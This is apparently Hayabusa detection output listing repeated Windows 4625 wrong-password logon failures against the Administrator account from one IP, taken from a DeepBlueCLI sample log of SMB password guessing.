2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
